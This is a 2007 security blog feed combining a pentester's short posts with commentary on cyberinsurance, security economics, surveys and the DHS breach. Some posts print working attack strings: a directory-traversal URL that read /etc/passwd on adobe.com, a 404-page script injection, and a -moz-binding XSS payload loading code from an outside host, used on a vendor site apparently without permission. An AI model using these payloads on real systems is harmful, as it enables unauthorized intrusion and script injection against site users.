Minggu, 30 September 2007

2 Factor Authentication Last Update

I think i am more or less done with my scope of work. There is simply no chance in hell that i can break that application. It like no matter what i entered, i always get a service not available or please try again later. Verified all the injection points and the stuffs that i can inject. Still, nothing can be done. The application is so sensitive and secure that it validates all input characters and escape all output characters. Lastly, every error message that is output is all generic error message with no other information. The only one last thing i am trying now is XSS on a 404 error page and see how it reacts. Still, this is what i got



And the generated source i got after the XSS:

[404 Not Found
Not Found
The requested URL /x/--><script>alert("XSS")</script><!--&node=465600 was not found on this server.]

The Hacka Man

Have you download your scancode?

I was reading on Shreeraj's article about source code review and it was overall a basic yet simple article on source code reviewing. Basically in the article, he teaches the audience from dependency determination to mitigation and countermeasures of a web application. On top of it, he included a tool where he coded himself called "scancode" which is used to scan source codes for potential entry point for XSS and SQLi. This is a must read for those who wants to know more about source code reviewing process and methoddology. Download scancode at page 3 of the article, right at the bottom.

http://www.oreillynet.com/pub/a/sysadmin/2006/11/02/webapp_security_scans.html

These days, i am so involved with application security and neglected on the networking area. Well, i am trying to shift myself slowly away from the technical side of things and wish to involve more in business and development stuff. However, still i will keep myself abreast of the latest stuff that is going around in the security world.

The Hacka Man

Sabtu, 29 September 2007

Adobe Directory Traversal???????

The other night Christ1an showed me a link of Adobe.com with directory traversal. It was an old exploit, however it works on Adobe. This showed how Adobe is not taking application security seriously. Well, i managed to saw the entire /etc/passwd file and DAMN!! i did not take a screen shot of it. I was too careless and excited not to take a screenshot. The following day, the issue was resolved with reports being made to Adobe. Well check out the exploit here that was used against Adobe:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwd

Add a null byte character at the end of passwd. Please note that the exploit will not work anymore. However, this is the actual string i used few nights ago.

The Hacka Man

HashMaster v0.2

Damn, Rsnake just released a small yet useful program known as the hashmaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing, however i am going to try it on the customer this weekend. The program is very simple to use. Just enter the cleartext password and the hashing string into the form, and the program will fetch the hashing algorithm used. This is rather useful. Because once you know the hashing algorithm, you can then use cracking software to crack for the actual passwords. Well, good work Rsnake, you actually made my job easier!

http://ha.ckers.org/hashmaster

The Hacka Man

Three Prereviews

I am fairly excited by several new books which arrived at my door last week. The first is Security Data Visualization by Greg Conti. I was pleased to see a book on visualization, but also a book in visualization in color! I expect to learn quite a bit from this book and hope to apply some of the lessons to my own work. The next book is End-to-End Network Security: Defense-in-Depth by Omar Santos. This book seems like a Cisco-centric approach to defending a network, but I decided to take a look when I noticed sections on forensics, visibility, and telemetry. The author includes several diagrams which show how to get information from a variety of devices in a manner similar to NSM. I hope to be able to operationalize this information as well. The last new book is LAN Switch Security: What Hackers Know About Your Switches by Eric Vyncke and Christopher Paggen. This book looks really interesting. It is probably going to be my favorite of these three. I don't spend much time in my classes talking about layer 2 defenses, so it is cool to see a modern book just about that topic. I believe most enterprises do little with layer 2 security, so perhaps this book can improve that situation.

Jumat, 28 September 2007

Cyberinsurance in IT Security Management

One more thought before I retire this evening. I really enjoyed reading Cyberinsurance in IT Security Management by Walter S. Baer and Andrew Parkinson. Here are my favorite excerpts.

IT security has traditionally referred to technical protective measures such as firewalls, authentication systems, and antivirus software to counter such attacks, and mitigation measures such as backup hardware and software systems to reduce losses should a security breach occur. In a networked IT environment, however, the economic incentives to invest in protective security measures can be perverse. My investments in IT security might do me little good if other systems connected to me remain insecure because an adversary can use any unprotected system to launch an attack on others.

In economic terms, the private benefits of investment are less than the social benefits, making networked IT security a public good — and susceptible to the free-rider problem. As a consequence, private individuals and organizations won’t invest sufficiently in IT security to provide an optimal (or even adequate) level of societal protection.

In other areas, such as fire protection, insurance has helped align private incentives with the overall public good. A building owner must have fire insurance to obtain a mortgage or a commercial business license. Obtaining insurance requires that the building meet local fire codes and underwriting standards, which can involve visits from local government and insurance company inspectors. Insurance investigators also follow up on serious incidents and claims, both to learn what went wrong and to guard against possible insurance abuses such as arson or fraud. Insurance companies often sponsor research, offer training, and develop best-practice standards for fire prevention and mitigation.

Most important, insurers offer lower premiums to building owners who keep their facilities clean, install sprinklers, test their control systems regularly, and take other protective measures. Fire insurance markets thus involve not only underwriters, agents, and clients, but also code writers, inspectors, and vendors of products and services for fire prevention and protection. Although government remains involved, well-functioning markets for fire insurance keep the responsibility for and cost of preventive and protective measures largely within the private sector.


That is so compelling. Unfortunately, the cyberinsurance market is currently small:

[B]usinesses now generally buy stand-alone, specialized policies to cover cyberrisks. According to Betterley Risk Consultants surveys, the annual gross premium revenue for cyberinsurance policies has grown from less than US$100 million in 2002 to US$300 to 350 million by mid 2006. These estimates, which are based on confidential survey responses from companies offering cyberinsurance, are nearly an order of magnitude below earlier projections made by market researchers and industry groups such as the Insurance Information Institute.

But Betterley, like many other industry experts, believes that cyberinsurance will be one of the fastest growing segments of the property and casualty market over the next several years. With only 25 percent of respondents to the most recent Computer Security Institute/US Federal Bureau of Investigation Computer Crime and Security survey reporting that, “their organizations use external insurance to help manage cybersecurity risks,” the market has plenty of room for growth.


So what are the problems?

The reported 25 percent cyberinsurance adoption rate appears low to many observers, given well-publicized increases in IT security breaches and greater regulatory pressures to deal with them. Although we could partially attribute the slow uptake to how long it takes organizations to acknowledge new security risks and budget for them, several other factors seem to be of particular concern for cyberinsurance. They include problems of asymmetric information, interdependent and correlated risks, and inadequate reinsurance capacity...

Insurance companies feel the effect of asymmetric information both before and after a customer signs an insurance contract. They face the adverse selection problem—that is, a customer who has a higher risk of incurring a loss (through risky behaviors or other—perhaps innate—factors) will find insurance at a given premium more attractive than a lower-risk customer. If the insurer can’t differentiate between them—and offer differentiated premiums—it won’t be able to sustain a profitable business.

Of course, to some extent, insurance companies can differentiate between risk types; sophisticated models can predict risk for traditional property/casualty insurance, and health insurance providers try to identify risk factors through questionnaires and medical examinations. Insurers can also apply these mechanisms to cyberinsurance: they can undertake rigorous security assessments, examining in-depth IT deployment and security processes.

Although such methods can reduce the asymmetric information between insurer and policyholder, they can never completely eliminate it. Particularly in the information security field, because risk depends on many factors, including technical and human factors and their interaction, surveys can’t perfectly quantify risk, and premium differentiation will be imperfect.

The second impact of asymmetric information occurs after an insurance contract has been signed. Insured parties can take (hidden) actions that increase or decrease the risk of claiming (for example, in the case of car insurance, driving carelessly, not wearing a seatbelt, or failing to properly maintain the car), but the insurer can’t observe the insured’s actions perfectly. Under full insurance, an individual has little incentive to undertake precautionary measures because any loss is fully compensated—a problem economists term moral hazard.

Insurers may be able to mitigate certain actions through partial insurance (so making a claim carries a monetary or convenience cost) and clauses in the insurance contract—for example, policyholders must usually meet a set standard of care, and fraudulent or other criminal actions (such as arson) are prohibited. However, many actions remain unobservable, and it’s difficult to prove that a client didn’t meet a due standard of care.

Cyberinsurers could administer surveys at regular intervals and link coverage to a certain minimum standard of security. Although this might be feasible from a technical standpoint, human factors are often the weakest link in the chain and possibly unobservable, so the moral hazard problem might not be completely alleviated, implying that the purchase of cyberinsurance could in fact reduce efforts on information security. Nevertheless, purchasers also have incentives to increase effort—that is, to invest in security to obtain insurance or reduce premiums—that would outweigh moral hazard effects in a viable and well-functioning market.

The problem of asymmetric information is common to all insurance markets; however, most markets function adequately given the range of tactics used by insurance companies to overcome these information asymmetries. Many of these remedies have developed over time in response to experience and result in the well-functioning insurance markets we see today.


This gives me some hope. The article continues:

[G]overnment actions to spur development of the cyberinsurance market could include assigning liability for IT security breaches, mandating incident reporting, mandating cyberinsurance or financial responsibility, or facilitating reinsurance by indemnifying catastrophic losses. Clarifying liability law to assign liability “to the party that can do the best job of managing risk” would make good economic sense, but it seems a political nonstarter in the US—and the problem’s global nature would require a global response.

Similarly, government regulations that mandate reporting of cyberincidents (similar to that required for civil aviation incidents and contagious disease exposures) appear to have little political support. Probably more plausible in the short run would be contractual requirements that government contractors carry cyberliability insurance on projects highly dependent on IT security...

Jane Winn of the University of Washington School of Law has proposed a self-regulatory strategy, based on voluntary disclosures of compliance with security standards and enforcement through existing trade practices law, as a politically more viable alternative than new government regulation. Such a strategy would require increased public awareness of cybersecurity (with possible roles for government) as well as public demand that organizations disclose whether they comply with technical standards or industry best practices.

Disclosures would be monitored for compliance by their customers and competitors; and in the case of deceptive advertising, the US Federal Trade Commission could take enforcement action under existing regulation. This strategy could spur cyberinsurance adoption, which would indicate that the organization has passed a security audit or otherwise met underwriters’ security standards.

Perhaps the most important role for government would be to facilitate a full and deep cyberreinsurance market, as the UK and US have done for reinsurance of losses due to acts of terrorism.


What a great article. I recommend reading it.

Security Staff as Ultimate Insurance

I'm continuing to cite the Fifth Annual Global State of Information Security:

Speaking of striking back, the 2007 security survey shows a remarkable (some might say troubling) trend.

The IT department wants to control security again.

In the first year of collaboration on this survey, CIO, CSO and PWC noted that the more confident a company was in its security, the less likely that company's security group reported to IT. Those companies also spent more on security.

The reason CIO and CSO have always advocated for the separation of IT and security is the classic fox-in-the-henhouse problem. To wit, if the CIO controls both a major project dedicated to the innovative use of IT and the security of that project — which might slow down the project and add to its cost — he's got a serious conflict of interest. In the 2003 survey, one CISO said that conflict "is just too much to overcome. Having the CISO report to IT, it's a death blow."


Ouch. CIO continues:

What's going on here? Johnson has one theory: "Security seems to be following a trajectory similar to the quality movement 20 or 30 years ago, only with security it's happening much faster. During the quality movement, everyone created VPs of quality. They got CEO reporting status. But then in 10 years the position was gone or it was buried."

In the case of the quality movement, Johnson says, that may have been partly because quality became ingrained, a corporate value, and it didn't need a separate executive. But the evidence in the survey suggests that security is neither ingrained nor valued. It's not even clear companies know where to put security, which would explain the "gobs of dotted line" reporting structures.

That brings us to another theory: organizational politics. What if separating security from IT were creating checks on software development (not a bad thing, from a security standpoint)? What if all this security awareness the survey has indicated actually exposed the typical IT department's insecure practices?

One way for IT to respond would be to attempt to defang security. Keep its enemy close. Pull the function back to where it can be better controlled.


Interesting. The article finishes with these thoughts:

[M]aybe security was never as separate as it seemed. Companies created CISO-type positions but never gave them authority. "I continually see security people put in the position of fall guy," says Woerner of TD Ameritrade. "Maybe some of that separation was, subconsciously, creating a group to take the hit."

This leads me to the title of my post. What if security staff is the ultimate insurance -- for the CIO? In other words, what if the CIO performs "security theater," creating a CISO position and staff, but doesn't give the CISO the authority or resources to properly defend the enterprise? If no breaches (seem) to occur, then the CIO looks like a hero for keeping security spending low. If a breach does occur (and is discovered), the CIO blames the CISO. The CISO is fired and the CIO keeps his/her job -- at least for now. I don't see a CIO executing this strategy more than once successfully.

What do you think?

Visibility, Visibility, Visibility

CIO Magazine's Fifth Annual Global State of Information Security features an image of a happy, tie-wearing corporate security person laying bricks to make a wall, while a dark-clad intruder with a crow bar violates the laws of physics by lifting up another section of the wall like it was made of fabric. That's a very apt reference to Soccer Goal Security, and I plan to discuss security physics in a future post. Right now I'd like to feature a few choice excerpts from the story:

Awareness of the problematic nature of information security is approaching an all-time high. Out of every IT dollar spent, 15 cents goes to security. Security staff is being hired at an increasing rate. Surprisingly, however, enterprise security isn't improving...

Are you feeling the disquiet that comes from knowing there's no reason why your company can't be the next TJX? The angst of knowing that these modern plagues — these spam e-mails, these bots, these rootkits — will keep coming at you no matter how much time and money you spend trying to stop them? The chill that comes from knowing how much you don't know...

You're undergoing a shift from a somewhat blissful ignorance of the serious flaws in computer security to a largely depressing knowledge of them...

"That next level of maturity has not been reached," says Mark Lobel, a principal with PWC's advisory services. "We have the technology but still don't have our hands around what's important and what we should be monitoring and protecting.


Not everyone has shifted from "somewhat blissful ignorance" to "largely depressing knowledge" yet, but they'll get there eventually.

Five years ago, 36 percent of respondents to the "Global State of Information Security" survey reported that they had suffered zero security incidents. This year, that number was down to 22 percent.

Does this mean there are more incidents? We don't think so. We believe it simply means that more companies are aware of the incidents that they've always suffered but into which, until recently, they had no visibility. Those once inexplicable network outages are now known to be security incidents. Perhaps a spam outbreak wasn't considered a security incident before, but now that it can deliver malware, it is. Awareness is higher, and that's because companies have spent the past five years building an infrastructure that creates visibility into their security posture.


That's right -- visibility. I love it.

This year marks the first time "employees" beat out "hackers" as the most likely source of a security incident. Executives in the security field, with the most visibility into incidents, were even more likely to name employees as the source.

Have employees suddenly turned more malicious? Are inside jobs suddenly more fashionable and productive than they used to be? Probably not. Most security experts will tell you that the insider threat is relatively constant and is usually bigger than its victims suspect. None of us wants to think we've hired an untrustworthy person.

This spike in assigning the blame for breaches and attacks to employees is probably more like the dip in companies that report zero incidents — a reflection of awareness, of managers' ability to recognize what was always there but what they couldn't previously determine.


I'd agree with that. I would also blame misreporting surfing pr0n sites and the like as "security incidents." CIO continues:

But here's an odd paradox: Despite the massive buildup of people, process and technology during the past five years, and fewer people reporting zero incidents, 40 percent of respondents didn't know how many incidents they've suffered, up from 29 percent last year.

The rate of "Don't know" for the type of incident and the primary method used to attack also spiked.

It doesn't bode well that after years of buying and installing systems and processes to improve security, close to half of the respondents didn't have a clue as to what was going on in their own enterprises. But when close to a third of CSOs and CISOs, who presumably should have the most insight into security incidents, said they don't know how many incidents they've suffered or how these incidents occurred, that's even worse...

The truth is, systems, processes, tools, hardware and software, and even knowledge and understanding only get you so far. As [Ron] Woerner puts it, "When you gain visibility, you see that you can't see all the potential problems. You see that maybe you were spending money securing the wrong things. You see that a good employee with good intentions who wants to take work home can become a security incident when he loses his laptop or puts data on his home computer. There's so much out there, it's overwhelming."

Woerner and others believe that the security discipline has so far been skewed toward technology—firewalls, ID management, intrusion detection - instead of risk analysis and proactive intelligence gathering.


Check this out, too. Someone recognizes the nature of Attacker 3.0:

Furthermore, even a cursory look at security trends demonstrates that adversaries, be they disgruntled employees or hackers, have far more sophisticated tools than the ones that have been put in place to stop them. Antiforensics. Mass distribution of malware through compromised websites. Botnets. Keyloggers. Companies may have spent the past five years building up their security infrastructure, but so have the bad guys. Awareness includes a new level of understanding of how little you know about how the bad guys operate. As arms races go, the bad guys are way ahead.

So what can we do about this? Say it isn't so:

What can be done about all this? Be strategic. Security investment must shift from the technology-heavy, tactical operation it has been to date to an intelligence-centric, risk analysis and mitigation philosophy.

Information and security executives should, for example, be putting their dollars into industry information sharing. "Collaboration is key," says Woerner. They should invest in security research and technical staff that can capture and dissect malware, and they should troll the Internet underground for the latest trends and leads.
(emphasis added)

I would add that it's only appropriate to turn to advanced sources when you have the security basics in place. It's no use trying to learn how to defend against attacker 2.0 or 3.0 if you can't handle 1.0.

There's more to say about this survey, but I'll save the rest for a second post because the nature of it is so different from this one.

Excerpts from Ross Anderson / Tyler Moore Paper

I got a chance to read a new paper by one of my three wise men (Ross Anderson) and his colleague (Tyler Moore): Information Security Economics - and Beyond. The following are my favorite sections.

Over the last few years, people have realised that security failure is caused by bad incentives at least as often as by bad design. Systems are particularly prone to failure when the person guarding them does not suffer the full cost of failure...

[R]isks cannot be managed better until they can be measured better. Most users cannot tell good security from bad, so developers are not compensated for efforts to strengthen their code. Some evaluation schemes are so badly managed that ‘approved’ products are less secure than random ones. Insurance is also problematic; the local and global correlations exhibited by different attack types largely determine what sort of insurance markets are feasible. Cyber-risk markets are thus generally uncompetitive, underdeveloped or specialised...

One of the observations that sparked interest in information security economics came from banking. In the USA, banks are generally liable for the costs of card fraud; when a customer disputes a transaction, the bank must either show she is trying to cheat it, or refund her money. In the UK, the banks had a much easier ride: they generally got away with claiming that their systems were ‘secure’, and telling customers who complained that they must be mistaken or lying. “Lucky bankers,” one might think; yet UK banks spent more on security and suffered more fraud. This may have been what economists call a moral-hazard effect: UK bank staff knew that customer complaints would not be taken seriously, so they became lazy and careless, leading to an epidemic of fraud.

In 1997, Ayres and Levitt analysed the Lojack car-theft prevention system and found that once a threshold of car owners in a city had installed it, auto theft plummeted, as the stolen car trade became too hazardous. This is a classic example of an externality, a side-effect of an economic transaction that may have positive or negative effects on third parties. Camp and Wolfram built on this in 2000 to analyze information security vulnerabilities as negative externalities, like air pollution: someone who connects an insecure PC to the Internet does not face the full economic costs of that, any more than someone burning a coal fire. They proposed trading vulnerability credits in the same way as carbon credits...

Asymmetric information plays a large role in information security. Moore showed that we can classify many problems as hidden-information or hidden-action problems. The classic case of hidden information is the ‘market for lemons'. Akerlof won a Nobel prize for the following simple yet profound insight: suppose that there are 100 used cars for sale in a town: 50 well-maintained cars worth $2000 each, and 50 ‘lemons’ worth $1000. The sellers know which is which, but the buyers don’t. What is the market price of a used car? You might think $1500; but at that price no good cars will be offered for sale. So the market price will be close to $1000.

Hidden information, about product quality, is one reason poor security products predominate. When users can’t tell good from bad, they might as well buy a cheap antivirus product for $10 as a better one for $20, and we may expect a race to the bottom on price.

Hidden-action problems arise when two parties wish to transact, but one party’s unobservable actions can impact the outcome. The classic example is insurance, where a policyholder may behave recklessly without the insurance company observing this...

[W]hy do so many vulnerabilities exist in the first place? A useful analogy might come from considering large software project failures: it has been known for years that perhaps 30% of large development projects fail, and this figure does not seem to change despite improvements in tools and training: people just built much bigger disasters nowadays than they did in the 1970s. This suggests that project failure is not fundamentally about technical risk but about the surrounding socio-economic factors (a point to which we will return later).

Similarly, when considering security, software writers have better tools and training than ten years ago, and are capable of creating more secure software, yet the economics of the software industry provide them with little incentive to do so.

In many markets, the attitude of ‘ship it Tuesday and get it right by version 3’ is perfectly rational behaviour. Many software markets have dominant firms thanks to the combination of high fixed and low marginal costs, network externalities and client lock-in noted above, so winning market races is all-important. In such races, competitors must appeal to complementers, such as application developers, for whom security gets in the way; and security tends to be a lemons market anyway. So platform vendors start off with too little security, and such as they provide tends to be designed so that the compliance costs are dumped on the end users. Once a dominant position has been established, the vendor may add more security than is needed, but engineered in such a way as to maximise customer lock-in.

In some cases, security is even worse than a lemons market: even the vendor does not know how secure its software is. So buyers have no reason to pay more for protection, and vendors are disinclined to invest in it.

How can this be tackled? Economics has suggested two novel approaches to software security metrics: vulnerability markets and insurance...

Several variations on vulnerability markets have been proposed. Bohme has argued that software derivatives might be better. Contracts for software would be issued in pairs: the first pays a fixed value if no vulnerability is found in a program by a specific date, and the second pays another value if one is found. If these contracts can be traded, then their price should reflect the consensus on software quality. Software vendors, software company investors, and insurance companies could use such derivatives to hedge risks. A third possibility, due to Ozment, is to design a vulnerability market as an auction...

An alternative approach is insurance. Underwriters often use expert assessors to look at a client firm’s IT infrastructure and management; this provides data to both the insured and the insurer. Over the long run, insurers learn to value risks more accurately. Right now, however, the cyber-insurance market is both underdeveloped and underutilised. One reason, according to Bohme and Kataria, is the interdependence of risk, which takes both local and global forms. Firms’ IT infrastructure is connected to other entities – so their efforts may be undermined by failures elsewhere.

Cyber-attacks often exploit a vulnerability in a program used by many firms. Interdependence can make some cyber-risks unattractive to insurers – particularly those risks that are globally rather than locally correlated, such as worm and virus attacks, and systemic risks such as Y2K.

Many writers have called for software risks to be transferred to the vendors; but if this were the law, it is unlikely that Microsoft would be able to buy insurance. So far, vendors have succeeded in dumping most software risks; but this outcome is also far from being socially optimal. Even at the level of customer firms, correlated risk makes firms under-invest in both security technology and cyber-insurance. Cyber-insurance markets may in any case lack the volume and liquidity to become efficient.
(emphasis added)

If you made it this far, here's my small contribution to this paper: what about breach derivatives? To paraphrase the paper, contracts for companies would be issued in pairs: the first pays a fixed value if no breach is reported by a company by a specific date, and the second pays another value if one is reported. If these contracts can be traded, then their price should reflect the consensus on company security.

I understand the incentives for companies to stay quiet about breaches, but this market could encourage people to report. I imagine it could also encourage intruders to compromise a company intentionally, as the authors mention:

One criticism of all market-based approaches is that they might increase the number of identified vulnerabilities by motivating more people to search for flaws.

What do you think?

Microsoft's Anemone Project

While flying to Los Angeles this week I read a great paper by Microsoft and Michigan researchers: Reclaiming Network-wide Visibility Using Ubiquitous Endsystem Monitors. From the Abstract:

Network-centric tools like NetFlow and security systems like IDSes provide essential data about the availability, reliability, and security of network devices and applications. However, the increased use of encryption and tunnelling has reduced the visibility of monitoring applications into packet headers and payloads (e.g. 93% of traffic on our enterprise network is IPSec encapsulated). The result is the inability to collect the required information using network-only measurements.

To regain the lost visibility we propose that measurement systems must themselves apply the end-to-end principle: only endsystems can correctly attach semantics to traffic they send and receive. We present such an end-to-end monitoring platform that ubiquitously records per-flow data and then we show that this approach is feasible and practical using data from our enterprise network.


This is cool. How does it work?

Each endsystem in a network runs a small daemon that uses spare disk capacity to log network activity. Each desktop, laptop and server stores summaries of all network traffic it sends or receives. A network operator or management application can query some or all endsystems, asking questions about the availability, reachability, and performance of network resources and servers throughout the organization...

Ubiquitous network monitoring using endsystems is fundamentally different from other edge-based monitoring: the goal is to passively record summaries of every flow on the network rather than to collect availability and performance statistics or actively probe the network...

It also provides a far more detailed view of traffic because endsystems can associate network activity with host context such as the application and user that sent a packet. This approach restores much of the lost visibility and enables new applications such as network auditing, better data centre management, capacity planning, network forensics, and anomaly detection.

Using real data from an enterprise network we present preliminary results showing that instrumenting, collecting, and querying data from endsystems in a large network is both feasible and practical.


How practical?

For example, our own enterprise network contains approximately 300,000 endsystems and 2,500 routers. While it is possible to construct an endsystem monitor in an academic or ISP network there are significant additional deployment challenges that must be addressed. Thus, we focus on deployment in enterprise and government networks that have control over software and a critical need for better network visibility...

Even under ideal circumstances there will inevitably be endsystems that simply cannot easily be instrumented, such as printers and other hardware running embedded software. Thus, a key factor in the success of this approach is obtaining good visibility without requiring instrumentation of all endsystems in a network. Even if complete instrumentation were possible, deployment becomes significantly more likely
where incremental benefit can be observed...

[I]nstrumenting just 1% of endsystems was enough to monitor 99.999% bytes on the network. This 1% is dominated by servers of various types (e.g. backup, file, email, proxies), common in such networks.


Wow -- in other words, just pick the right systems to instrument and you end up capturing a LOT of traffic.

How heavy is the load?

To evaluate the per-endsystem CPU overhead we constructed a prototype flow capture system using the ETW event system [Event Tracing for Windows]. ETW is a low overhead event posting infrastructure built into the Windows OS, and so a straightforward usage where an event is posted per-packet introduces overhead proportional to the number of packets per second processed by an endsystem.

We computed observed packets per second over all hosts, and the peak was approximately 18,000 packets per second and the mean just 35 packets per second. At this rate of events, published figures for ETW [Magpie] suggest an overhead of a no more than a few percent on a reasonably provisioned server...

[F]or a 1 second export period there are periods of high traffic volume requiring a large number of records be written out. However, if the export timer is set at 300 seconds, the worst case disk bandwidth required is ≃4.5 MB in 300 seconds, an average rate of 12 kBps.

The maximum storage required by a single machine for an entire week of records is ≃1.5 GB, and the average storage just ≃64 kB. Given the capacity and cost of modern hard disks, these results indicate very low resource overhead.


This is great. I emailed the authors to see if they have an implementation I could test. The home for this work appears to be the Microsoft Anemone Project.

Be the Caveman

I just read a great story by InformationWeek's Sharon Gaudin titled Interview With A Convicted Hacker: Robert Moore Tells How He Broke Into Routers And Stole VoIP Services:

Convicted hacker Robert Moore, who is set to go to federal prison this week, says breaking into 15 telecommunications companies and hundreds of businesses worldwide was incredibly easy because simple IT mistakes left gaping technical holes.

Moore, 23, of Spokane, Wash., pleaded guilty to conspiracy to commit computer fraud and is slated to begin his two-year sentence on Thursday for his part in a scheme to steal voice over IP services and sell them through a separate company. While prosecutors call co-conspirator Edwin Pena the mastermind of the operation, Moore acted as the hacker, admittedly scanning and breaking into telecom companies and other corporations around the world.

"It's so easy. It's so easy a caveman can do it," Moore told InformationWeek, laughing. "When you've got that many computers at your fingertips, you'd be surprised how many are insecure."
(emphasis added)

So easy a caveman can do it? Just what happened here?

The government identified more than 15 VoIP service providers that were hacked into, adding that Moore scanned more than 6 million computers just between June and October of 2005. AT&T reported to the court that Moore ran 6 million scans on its network alone...

Moore said what made the hacking job so easy was that 70% of all the companies he scanned were insecure, and 45% to 50% of VoIP providers were insecure. The biggest insecurity? Default passwords.

"I'd say 85% of them were misconfigured routers. They had the default passwords on them," said Moore. "You would not believe the number of routers that had 'admin' or 'Cisco0' as passwords on them. We could get full access to a Cisco box with enabled access so you can do whatever you want to the box...

He explained that he would first scan the network looking mainly for the Cisco and Quintum boxes. If he found them, he would then scan to see what models they were and then he would scan again, this time for vulnerabilities, like default passwords or unpatched bugs in old Cisco IOS boxes. If he didn't find default passwords or easily exploitable bugs, he'd run brute-force or dictionary attacks to try to break the passwords.


So, we have massively widespread scanning, discovery of routers, and attempted logins. No kidding this is caveman-fu.

And Moore didn't just focus on telecoms. He said he scanned "anybody" -- businesses, agencies and individual users. "I know I scanned a lot of people," he said. "Schools. People. Companies. Anybody. I probably hit millions of normal [users], too."

Moore said it would have been easy for IT and security managers to detect him in their companies' systems ... if they'd been looking. The problem was that, generally, no one was paying attention.

"If they were just monitoring their boxes and keeping logs, they could easily have seen us logged in there," he said, adding that IT could have run its own scans, checking to see logged-in users. "If they had an intrusion detection system set up, they could have easily seen that these weren't their calls."
(emphasis added)

Didn't someone tell Robert Moore that "IDS is dead?" Apparently all of these victim companies heard it, and turned off their visibility mechanisms.

My advice? Be the caveman. Perform adversary simulation. This is the simplest possible way to pretend you are a bad guy and get realistic, actionable results.

  1. Identify all of your external IP addresses.

  2. Scan them.

  3. Try to log into remote administration services you find in Step 2.

  4. Report your findings to device owners when you gain access.


How difficult is that? This methodology is nowhere near to being effective against targeted threats who want to compromise you specifically, but they would work against this opportunistic threat.

PS: If I hear one more time that "scanning is too dangerous for our network" I will officially Lose It. Scanning of external systems happens 24x7. If you really don't want an authorized party to scan your external network, try setting up a passive detection systems like PADS and wait for a bad guy to ignore the fragility of your systems and scan them for you. Gather his results passively and then act on them.

Snort Report 9 Posted

My 9th Snort Report on Snort's Stream5 and TCP overlapping fragments is now available online. From the start of the article:

It's important for value-added resellers and consultants to understand how Snort detects security events. Stream5 is a critical aspect of the inspection and detection equation. A powerful Snort preprocessor, Stream5 addresses several aspects of network-centric traffic inspection. Sourcefire calls Stream5 a "target-based" system, meaning it can perform differently depending on the directives passed to it. These directives tell Stream5 to inspect traffic based on its understanding of differences of behavior in TCP/IP stacks. However, if Stream5 isn't configured properly, customers may end up with a Snort installation that is running but not providing much real value. In this edition of Snort Report I survey a specific aspect of Stream5, found in Snort 2.7.x and 2.8.x.

I'm working on the next Snort Report, which will look at new features in Snort 2.8.

Can Your Machine Be Hacked?

Last night, i received an email from Rich Mclver and he gave me a link to publish. Basically, in his post, he provide users with ideas of how to secure holes in your PC. There are 12 tests and all of which gave an rough idea of how to secure your machine. Well, i would say it is a good start for those who wants to start learning about security overall. Check it out:

http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/

The Hacka Man

Kamis, 27 September 2007

Blueinfy.com

Want to know more about Web 2.0 hacking?
Want to have free Web 2.0 auditing tools and articles?
Want to know more about web security and hacking?

You will have to check out Blueinfy.com, it is definitely a site worth visiting. With great in depth articles to simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj.Shah, an ex employee of Foundstone USA. Google him and you will know how powerful is he:)

The Hacka Man

XSS on a vendors website

I am still testing on the application for flaws. However, it is so secure that i can't do a single thing. In the end, i end up testing a vendors site for XSS. The vendor did a good job of escaping < and > characters and it gave me <SCRIPT>alert(2)</SCRIPT> when i view the source code. I was dejected as i knew there is something more i can do. A few minutes later, .mario was online and i told him about my problem. Immediatedly, he came up with a trick that allows XSS to happen. So in the end, i entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a=" into the one of the form fields and when i view the source code, it was totally injected! This was what it displayed on the source code

[input name="TxnEnd_Param" value="" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)" a="" type="hidden"]

Thank you .mario, you helped me understand XSS a lot more.

The Hacka Man

Selasa, 25 September 2007

DHS Debacle

Thanks to the Threat Level story FBI Investigates DHS Contractor for Failing to Protect Gov't Computer I learned of the Washington Post story Contractor Blamed in DHS Data Breaches:

The FBI is investigating a major information technology firm with a $1.7 billion Department of Homeland Security contract after it allegedly failed to detect cyber break-ins traced to a Chinese-language Web site and then tried to cover up its deficiencies, according to congressional investigators.

At the center of the probe is Unisys Corp., a company that in 2002 won a $1 billion deal to build, secure and manage the information technology networks for the Transportation Security Administration and DHS headquarters. In 2005, the company was awarded a $750 million follow-on contract.

On Friday, House Homeland Security Committee Chairman Bennie Thompson (D-Miss.) called on DHS Inspector General Richard Skinner to launch his own investigation.

As part of the contract, Unisys, based in Blue Bell, Pa., was to install network-intrusion detection devices on the unclassified computer systems for the TSA and DHS headquarters and monitor the networks. But according to evidence gathered by the House Homeland Security Committee, Unisys's failure to properly install and monitor the devices meant that DHS was not aware for at least three months of cyber-intrusions that began in June 2006.

Through October of that year, Thompson said, 150 DHS computers -- including one in the Office of Procurement Operations, which handles contract data -- were compromised by hackers, who sent an unknown quantity of information to a Chinese-language Web site that appeared to host hacking tools.

The contractor also allegedly falsely certified that the network had been protected to cover up its lax oversight, according to the committee.

"For the hundreds of millions of dollars that have been spent on building this system within Homeland, we should demand accountability by the contractor," Thompson said in an interview. "If, in fact, fraud can be proven, those individuals guilty of it should be prosecuted."


Wow. This is huge. I cannot remember any case like it. So what happened?

In the 2006 attacks on the DHS systems, hackers often took over computers late at night or early in the morning, "exfiltrating" or copying and sending out data over hours -- in one case more than five hours, according to evidence collected by the committee.

Five hours. That indicates one means of detecting this sort of activity: time-based analysis of session records.

In July 2006, a Unisys employee detected a possible intrusion but "downplayed it and low-level DHS security managers ignored it," the committee aide said.

It was not until Sept. 27, 2006, that two DHS systems managers noticed that their machines had been accessed with a hacking tool.

Unisys information technology employees began a probe and determined that the break-in affected more computers. They discovered that it reached back as far as June 13 that year and had continued through at least Oct. 1, eventually reaching 150 computers.

Among the security devices Unisys had been hired to install and monitor were seven "intrusion-detection systems," which flag suspicious or unauthorized computer network activity that may indicate a break-in. The devices were purchased in 2004, but by June 2006 only three had been installed -- and in such a way that they could not provide real-time alerts, according to the committee. The rest were gathering dust in DHS storage closets and under desks in their original packaging, the aide said.
(emphasis added)

This explains a lot!

Let's finish with this thought:

A Unisys spokeswoman, Lisa Meyer... said that Unisys has provided DHS "with government-certified and accredited security programs and systems, which were in place throughout 2006 and remain so today."

